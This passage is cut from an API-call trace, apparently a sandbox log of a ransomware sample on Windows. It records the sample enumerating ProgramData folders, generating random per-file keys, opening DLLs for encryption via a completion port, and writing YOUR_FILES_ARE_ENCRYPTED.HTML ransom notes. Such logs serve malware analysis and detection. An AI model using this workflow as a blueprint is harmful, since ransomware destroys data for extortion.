(pszPath="ppcrlconfig.dll") returned=".dll" [0156.822] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0156.822] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0156.823] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=15616) returned 1 [0156.823] GetProcessHeap () returned 0x270000 [0156.823] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73f0050 [0156.829] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="33") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="AE") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="C5") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="34") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="B5") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="F4") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="34") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="E3") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="92") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="02") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="E7") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D0") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="0C") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="27") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="A5") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="AC") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="2B") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="59") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="A8") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="D3") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="43") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="A2") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F6") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="88") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="C9") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="0A") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="FB") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="A6") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="46") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="58") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="53") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="1D") returned 2 [0156.831] lstrcpyW (in: lpString1=0x7400104, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" [0156.831] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.831] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73f0050, lpOverlapped=0x73f0050) returned 1 [0156.831] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xa02a357c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 1 [0156.831] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0156.831] lstrcmpW (lpString1="ppcrlui.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.831] PathFindExtensionW (pszPath="ppcrlui.dll") returned=".dll" [0156.831] lstrlenW (lpString=".dll") returned 4 [0156.831] PathFindExtensionW (pszPath="ppcrlui.dll") returned=".dll" [0156.831] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0156.831] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.842] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=254216) returned 1 [0156.843] GetProcessHeap () returned 0x270000 [0156.843] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.859] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="CF") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="02") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="0E") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="CB") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="4D") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="CD") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="0C") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="8A") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="FD") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="96") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="04") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="5C") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="ED") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="69") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="DD") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="B5") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="82") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="5B") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="F4") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="72") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="D6") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="C6") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="59") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="6C") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="05") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="A7") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="57") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="5A") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="37") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="9B") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="E5") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="6C") returned 2 [0156.861] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" [0156.861] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.861] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.861] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xa02a357c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 0 [0156.861] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.863] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0156.863] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\identitycrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.884] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.887] CloseHandle (hObject=0x598) returned 1 [0156.887] GetProcessHeap () returned 0x270000 [0156.888] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.897] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x263aa572, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x263aa572, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0156.897] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player") returned 41 [0156.897] GetProcessHeap () returned 0x270000 [0156.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.900] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player" [0156.900] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*" [0156.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x263aa572, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x263aa572, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.901] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x263aa572, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x263aa572, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.901] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x263aa572, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x263aa572, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.902] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.902] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0156.902] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.902] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.905] CloseHandle (hObject=0x598) returned 1 [0156.906] GetProcessHeap () returned 0x270000 [0156.907] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.907] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MF", cAlternateFileName="")) returned 1 [0156.907] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned 31 [0156.907] GetProcessHeap () returned 0x270000 [0156.907] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.907] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF" [0156.907] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*" [0156.907] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.908] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.908] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0156.908] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0156.908] lstrcmpW (lpString1="Active.GRL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.908] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0156.908] lstrlenW (lpString=".GRL") returned 4 [0156.908] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0156.908] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0156.908] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0156.908] lstrcmpW (lpString1="Pending.GRL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.908] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0156.908] lstrlenW (lpString=".GRL") returned 4 [0156.908] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0156.908] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0156.908] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.908] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0156.909] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\mf\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.909] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.911] CloseHandle (hObject=0x598) returned 1 [0156.912] GetProcessHeap () returned 0x270000 [0156.913] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.913] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0156.913] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned 41 [0156.913] GetProcessHeap () returned 0x270000 [0156.913] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.913] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework" [0156.913] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*" [0156.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.914] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.914] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0156.914] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned 57 [0156.914] GetProcessHeap () returned 0x270000 [0156.914] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.914] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore" [0156.914] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*" [0156.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.915] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, 